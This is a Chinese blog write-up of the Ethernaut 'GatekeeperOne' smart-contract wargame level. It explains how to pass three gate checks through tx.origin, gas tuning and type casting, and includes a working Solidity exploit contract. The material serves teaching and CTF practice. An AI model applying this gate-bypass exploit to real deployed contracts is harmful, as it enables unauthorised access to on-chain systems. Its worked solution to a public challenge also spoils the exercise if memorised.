ethernaut——GatekeeperOne

最新推荐文章于 2024-07-16 15:11:55 发布
最新推荐文章于 2024-07-16 15:11:55 发布
阅读量194 收藏
点赞数
分类专栏: ethernaut_2023详解 文章标签: 安全 区块链 智能合约
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78046362/article/details/130787480
版权

第十三关:GatekeeperOne

文章目录

本关知识点:

1. 类型强制转换
2. 链上gas消耗的计算方式
3. 区分msg.sender和tx.origin

1. 题目要求

越过守门人并且注册为一个参赛者来完成这一关.

2. 代码功能解读

请添加图片描述

3. 漏洞分析

成功调用enter方法
	创建攻击合约调用绕开gateOne的检测
	控制gasleft使求余8191为0
	我们可以根据变量的强制转换方式,找到一个符合以上三个条件的8字节变量

我计算gas大小的方法,先执行一次失败的交易,去etherscan中找到gasleft的时候gas的消耗量,然后重新计算后输入正确的gas费用。如图所示,我输入的gas为200000,执行完gasleft()后还剩199744,消耗了256.
请添加图片描述请添加图片描述

我发送的gas数量:819100+256 = 819356

我推到gateKey的推导思路:
// ffffffffffffffff == ffffffff0000ffff >> 第九到第十二个字符肯定为0
// ffffffff0000ffff != 000000000000ffff >> 前8字符肯定有值
// ffffffff0000ffff == ffffffff0000ffff(tx.origin) >> 最后四个字符的值为tx.origin的后四个字符
由上可知:通过tx.origin和ffffffff0000ffff做与运算就能得到正确的bytes8。

4. 攻击方法

contract Exploit {

  GatekeeperOne one;
  uint64 number = 0xffffffff0000ffff;

  constructor(address addr) payable{
    one = GatekeeperOne(addr);
  }

  function testGas()public {
  
    bytes8 value;
    value = getValue();
    one.enter{gas: 200000 wei}(value);
  }

  function attack(uint256 gasValue_)public {

    bytes8 value;
    value = getValue();
    one.enter{gas: gasValue_}(value);
  }

  function getValue() public view returns(bytes8){
  
    uint64 message = uint64(uint160(tx.origin));
    bytes8 sendValue = bytes8(number & message);
    return sendValue;
  }

}

5. 攻击调用图

攻击成功,结果变成了我们自己的地址。

请添加图片描述
请添加图片描述

6. 知识点分析

在编写智能合约的过程中,对合约的gas,进制转换和调用者的了解都是很重要的,可以在我们编写合约的时候达到更好的优化效果,也可以让我们更清晰的了解在阅读交易的过程中的调用情况。

如果对大家有用,请点赞;如果喜欢,请订阅加点赞,会一直更新~

陵野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ethernaut GateKeeperOne
love_wjk的博客
08-13 361
通关要求: 通过三个限制函数,以entrant身份注册。 题目源码 pragma solidity ^0.5.0; import 'openzeppelin-solidity/contracts/math/SafeMath.sol'; contract GatekeeperOne { using SafeMath for uint256; address public entrant; modifier gateOne() { require(msg.sender != tx.o
通过调试找到gas消耗 -ethernaut GatekeeperOne
d744486832的博客
04-07 1120
通过调试找到gas消耗 1.在学习ethernaut的过程中,遇到了一个GatekeeperOne的题目,需要用到调试来查看gas的每一步消耗情况。当时找了很多writeup都是直接就出来了gas应该为多少,但是脑瓜子嗡嗡的,下面说一下我自己的解题过程 源代码: pragma solidity ^0.4.18; import 'openzeppelin-solidity/contracts/ma...
GateOne CVE-2020-35736 任意文件读取漏洞复现
Jaky5320的博客
05-27 571
0x00:简介    GateOne 是一款使用 HTML5 技术编写的网页版 SSH 终端模拟器。基于现代的 HTML5 技术,无需任何浏览器插件、支持多个 SSH 进程、可以嵌入到其他任意应用程序中、支持使用 JavaScript,Python 甚至纯 CSS 编写的插件、支持 SSH 进程副本,打开多个进程而无需重复输入密码、 支持各种服务器端的日志功能,支持 Keberos-based 单点登录甚至活动目录、 支持操作日志记录,具有操作记录
gateone(webshell安装过程)
AinUser的博客
07-20 1571
0.yum install -y  wget 1.wget https://github.com/downloads/liftoff/GateOne/tornado-2.4-1.noarch.rpm 2.wget https://github.com/downloads/liftoff/GateOne/gateone-1.1-1.noarch.rpm 3.wget https://boots...
ethernaut——NaughtCoin
2301_78046362的博客
05-20 126
本合约继承了erc20合约,那么我们可以阅读ERC20合约查看可以不用本人直接转账,采用授权给其他人的方法,来提出token。所以,在我们阅读合约的过程中,对继承的合约,或者常见的合约类型进行分析是很重要的一点!切换账户后transferFrom发送所有的token给自己。
ethernaut——Telephone
2301_78046362的博客
05-14 79
【代码】ethernaut——Telephone。
ethernaut——Vault
2301_78046362的博客
05-17 172
合约中私有变量的读取。
ethernaut-ctf-memo:Ethernaut CTF的一些备忘
05-12
ethernaut-ctf-memo Ethernaut CTF的一些备忘: ://ethernaut.zeppelin.solutions 等级 0.你好Ethernaut 1.后备 2.辐射 3.投币 4.电话 5.代币 6.委派 7.力量 8.金库 9.国王 10.再入 11.电梯 12.隐私权...
ethernaut:Web3基于固体的战争游戏
04-28
Ethernaut Ethernaut是一个基于WEB3 /密实度的战争游戏中启发 ,在复仇虚拟机进行播放。 每个级别都是一个需要被“破解”的智能合约。 该游戏既充当有兴趣学习以太坊的人的工具,又是按等级分类历史骇客的一种方式...
ethernaut-ctf:Ethernaut CTF解决方案(https
03-31
醚瑙ctf 基于 ...安装依赖项 运行npm install来安装Ganache-cli和Truffle 用法 使用npx ganache-cli --port 7545在端口7545上启动ganache-cli 将合同部署到运行npx truffle migrate本地区块链 使用npx truffle exec ...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 436
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 309
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1385
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 469
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 874
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 309
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
网络安全威胁情报到底是什么
学-> 思->用
07-10 614
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 579
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值